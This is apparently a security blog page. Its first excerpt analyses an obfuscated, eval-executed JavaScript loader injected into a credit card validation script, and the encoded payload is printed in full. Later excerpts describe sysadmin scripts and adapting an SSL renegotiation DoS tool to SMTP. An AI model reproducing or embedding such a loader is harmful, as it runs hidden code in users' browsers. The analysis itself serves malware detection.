31\x31\x36\x2c\x31\x30\x31\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x31\x32\x34\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x37\x39\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x34\x39\x2c\x35\x32\x2c\x35\x30\x2c\x35\x31\x2c\x35\x30\x2c\x35\x35\x2c\x35\x32\x2c\x35\x36\x2c\x34\x39\x2c\x35\x32\x2c\x34\x39\x2c\x35\x33\x2c\x34\x39\x2c\x31\x32\x34\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x30\x32\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x37\x2c\x39\x38\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x31\x39\x2c\x31\x32\x34\x2c\x34\x39\x2c\x35\x30\x2c\x34\x38\x2c\x34\x39\x2c\x35\x37\x2c\x35\x32\x2c\x35\x32\x2c\x35\x36\x2c\x35\x35\x2c\x34\x39\x2c\x35\x30\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x36\x37\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x37\x2c\x31\x30\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x39\x35\x2c\x39\x35\x2c\x31\x30\x33\x2c\x39\x37\x2c\x31\x30\x35\x2c\x31\x30\x30\x2c\x31\x32\x34\x2c\x37\x31\x2c\x36\x35\x2c\x34\x39\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x37\x36\x2c\x31\x31\x31\x2c\x31\x31\x39\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x36\x37\x2c\x39\x37\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x30\x38\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x37\x37\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x39\x37\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x37\x33\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x37\x39\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x30\x2c\x31\x31\x31\x2c\x39\x39\x2c\x31\x31\x37\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x38\x34\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x31\x35\x2c\x31\x30\x35\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x39\x37\x2c\x31\x31\x38\x2c\x31\x30\x35\x2c\x31\x30\x33\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x30\x34\x2c\x39\x37\x2c\x31\x32\x34\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x38\x39\x2c\x31\x30\x31\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x37\x2c\x31\x30\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x38\x2c\x39\x37\x2c\x31\x30\x38\x2c\x31\x31\x37\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x35\x31\x2c\x35\x33\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x31\x30\x30\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x30\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x31\x35\x2c\x36\x36\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x39\x2c\x31\x30\x31\x2c\x31\x30\x31\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x35\x34\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x31\x37\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x31\x30\x30\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x30\x36\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x36\x37\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x37\x2c\x31\x30\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x37\x37\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x30\x37\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x31\x30\x35\x2c\x31\x31\x36\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x30\x37\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x36\x38\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x33\x2c\x31\x32\x34\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x37\x37\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x38\x39\x2c\x31\x30\x31\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x36\x38\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x32\x34\x2c\x34\x39\x2c\x35\x36\x2c\x34\x38\x2c\x31\x32\x34\x2c\x35\x36\x2c\x35\x34\x2c\x35\x32\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x38\x34\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x37\x30\x2c\x31\x31\x37\x2c\x31\x30\x38\x2c\x31\x30\x38\x2c\x38\x39\x2c\x31\x30\x31\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x37\x37\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x39\x37\x2c\x39\x38\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x35\x30\x2c\x34\x38\x2c\x34\x39\x2c\x35\x33\x2c\x31\x32\x34\x2c\x31\x30\x32\x2c\x39\x37\x2c\x31\x30\x38\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x37\x33\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x32\x34\x2c\x34\x38\x2c\x35\x36\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x30\x34\x2c\x31\x31\x36\x2c\x31\x31\x36\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x34\x39\x2c\x34\x38\x2c\x34\x38\x2c\x31\x32\x34\x2c\x39\x38\x2c\x31\x31\x34\x2c\x31\x31\x31\x2c\x31\x31\x39\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x37\x36\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x31\x37\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x31\x37\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x31\x31\x39\x2c\x31\x31\x39\x2c\x31\x31\x39\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x31\x31\x2c\x39\x39\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x31\x31\x39\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x31\x31\x2c\x31\x31\x39\x2c\x31\x32\x34\x2c\x31\x30\x32\x2c\x31\x30\x38\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x30\x32\x2c\x31\x30\x31\x2c\x31\x30\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x30\x37\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x31\x30\x35\x2c\x31\x30\x30\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x31\x30\x34\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x31\x31\x39\x2c\x31\x30\x31\x2c\x31\x30\x38\x2c\x39\x39\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x38\x32\x2c\x31\x30\x31\x2c\x31\x30\x33\x2c\x36\x39\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x37\x31\x2c\x37\x37\x2c\x38\x34\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x39\x39\x2c\x39\x37\x2c\x31\x31\x32\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x39\x2c\x39\x37\x2c\x31\x31\x36\x2c\x39\x39\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x34\x39\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x31\x32\x34\x2c\x35\x30\x2c\x35\x32\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x31\x30\x35\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x39\x39\x2c\x39\x37\x2c\x31\x31\x32\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x33\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x32\x31\x2c\x39\x37\x2c\x31\x30\x34\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x31\x31\x37\x2c\x31\x30\x38\x2c\x31\x30\x38\x2c\x31\x32\x34\x2c\x39\x38\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x33\x39\x2c\x34\x36\x2c\x31\x31\x35\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x31\x30\x35\x2c\x31\x31\x36\x2c\x34\x30\x2c\x33\x39\x2c\x31\x32\x34\x2c\x33\x39\x2c\x34\x31\x2c\x34\x34\x2c\x34\x38\x2c\x34\x34\x2c\x31\x32\x33\x2c\x31\x32\x35\x2c\x34\x31\x2c\x34\x31\x2c\x31\x30"
t=window["\x65\x76\x61\x6c"]("String.fromCharCode("+t+")");window["\x65\x76\x61\x6c"](t);
// You have permission to copy and use this javascript provided that
// the content of the script is not changed in any way.

function validateCreditCard(s) {
    // remove non-numerics
    var v = "0123456789";
    var w = "";
    for (i=0; i < s.length; i++) {
        x = s.charAt(i);
        if (v.indexOf(x,0) != -1)
        w += x;
    }
    // validate number
    j = w.length / 2;
    k = Math.floor(j);
    m = Math.ceil(j) - k;
    c = 0;
    for (i=0; i<k; i++) {
        a = w.charAt(i*2+m) * 2;
        c += a > 9 ? Math.floor(a/10 + a%10) : a;
    }
    for (i=0; i<k+m; i++) c += w.charAt(i*2+1-m) * 1;
    return (c%10 == 0);
}

Notice anything? Yep, the third and fourth line look awfully strange. Eerily strange even. What should be obvious is that nothing is obvious, except that there is probably some JavaScript obfuscation going on. JavaScript obfuscation is used regularly by bad guys trying to evade malware and exploit detection by IDS/IPS and such, or even by supposedly “good” guys that are like “don’t steal my code, dude!!!1”. While obfuscation by compressing JavaScript (removing unnecessary whitespace for faster load/browser execution) is understandable, I find the latter rather questionable, but whatever.
For some fun JavaScript obfuscation samples check out jjencode and aaencode by Yosuke Hasegawa.

At least in this example the obfuscated part appears very out of place, so it’s safe to assume these lines were injected with some malicious intent. Virustotal also shows that that McAfee and TrendMicro detect the file as malicious malware with their respective heuristic signatures BehavesLike.JS.ExploitBlacole.mx and HEUR_HTJS.HDJSFN.

Continue reading

[Script] Extending Linux LVM partitions

Here’s a script I wrote a while a go to extend LVM partitions on Linux machines.

The script assumes that you have extended the existing underlying physical (or “virtual” if it’s a VM) storage device prior to execution. It will rescan the disks (skip with -f), resize the existing partition (basically just setting a different end sector), reboot, and run scripts to extend the actual file system after the reboot. There are other ways to extend the disk space including creating a new partition on the additional disk space, but I’ve decided against that approach in favor of a single-partition scheme for management/simplicity’s sake.

This script will work with VMs and physical servers alike. I’ve tested it with RHEL 6/7 and CentOS 6/7, but it should generally work with other Linux distributions as well.

You can get the most recent version of this script on Github here. If you have any suggestions or improvements (which I’m sure there is plenty of room for), feel free to drop a comment or an issue or a pull-request on Github.

Continue reading

THC SSL Renegotiation DoS Tool for SMTP STARTTLS

The so called Secure Client-Initiated Renegotiation function of SSL/TLS suffers from a possible DoS danger because it burdens the server’s CPU orders of magnitude more than the client’s, who initiates it. Because of that, Client-Initiated Renegotiation is nowadays disabled by default in virtually all widely used SSL/TLS implementations.

However, I noticed that it seems to be still enabled by default on the postfix SMTP daemon including recent releases (postfix 2.6.6) and openssl (1.0.1j) versions and there appears to be no way of disabling it in the configuration. Since I already used the thc ssl dos tool which exploits this vulnerability in previous penetration tests on webservers, I thought it would be nice if it worked with SMTP mailservers supporting STARTTLS as well.

Continue reading

[Script] Poor man’s vSphere network health check for standard vSwitches

Among many other new features, the vSphere 5.1 distributed vSwitch brought us the Network Health Check feature. The main purpose of this feature is to ensure that all ESXi hosts attached to a particular distributed vSwitch can access all VLANs of the configured port groups and with the same MTU. This is really useful in situations where you’re dealing with many VLANs and the roles of virtualization and network admin are strongly separated.

Unfortunately, like pretty much all newer networking features, the health check is only included in the distributed vSwitch which requires vSphere Enterprise+ licenses.

There are a couple other (cumbersome) options you have though:
If you’re have ESXi 5.5 you can use the pktcap-uw utility on the ESXi shell to check if your host receives frames for a specific VLAN on an uplink port:
The following example command will capture receive-side frames tagged with VLAN 100 on uplink vmnic3:
# pktcap-uw –uplink vmnic3 –dir 0 –capture UplinkRcv –vlan 100
If systems are active in this VLAN you should see a few broadcasts or multicasts already and meaning the host is able to receive frames on this NIC for this VLAN. Repeat that for every physical vmnic uplink and VLAN.

Another way to check connectivity is to create a vmkernel interface for testing on this VLAN and using vmkping. Since manually configuring a vmkernel interface for every VLAN seems like a huge PITA, I came up with a short ESXi shell script to automate that task.
Check out the script below. It uses a CSV-style list to configure vmkernel interfaces with certain VLAN and IP settings, pinging a specified IP on that network with the given payload size to account for MTU configuration. This should at least take care of initial network-side configuration errors when building a new infrastructure or adding new hosts.
This script was tested successfully on ESXi 5.5 and should work on ESXi 5.1 as well. I’m not entirely sure about 5.0 but that should be ok too. (Please leave a comment in case you can confirm/refute that).

Introducing the ghetto-vSwitchHealthCheck.sh:

Update: I have moved my scripts to GitHub and updated some of them a bit. You can find the current version of this particular script here.

Continue reading

Forefront TMG Log Export with MSDEToText.vbs messing up IPs

Logging Firewall or Web Proxy traffic on a Forefront TMG/ISA node into the local SQL Express-based database (which is the default setting) has a few advantages, like being able to query past logs through the TMG console. But sometimes it’s better to have logs stored in a plain text format as well for a 3rd party tool or your own log analysis scripts.

For this purpose, Microsoft provides the MSDEToText.vbs tool to export logs from a TMG/ISA SQL database into text files.

why

why

However, the MSDEToText script is producing some weird results for my TMG environments, namely it fails to convert the source and destination IP-addresses properly:
For example, what should be exported as “192.168.1.11” ends up as “-63.-87.-254.-245”, with negative numbers per octet in the text log. Notice something? Yeah, subtracting each value from 255 yields us the correct IP (well, almost except for the last octet which is off by 1). This happens only for IPs that don’t have an existing computer object defined in the TMG policy.

There is obviously something wrong with the logic inside the MSDEToText VB script. Being completely clueless about VBS (I can’t even remember ever seriously coding/editing something longer than two lines), I dug into the script to see what makes it go bonkers and found the following function to be responsible:

Continue reading

[Script] Perl – Check Point firewall logfile analysis – rule usage

Continuing from my previous post, here’s another quick and dirty perl script I used some time ago to provide a basic analysis of Check Point firewall logfiles in terms of rule usage.

It kind of lost the the bit of usefulness it had with the rule base hit counter that was introduced in R75.40, but maybe someone can still make use of this horrible code. Or some better examples like this to begin with.
The script here also includes info on implicit rules, address spoofing, whacky ICMP packets or basically any stuff that isn’t logged with an actual rule name.

Again this script will obviously only be able to gather statistics of firewall rules you’ve actually set to logging.

Continue reading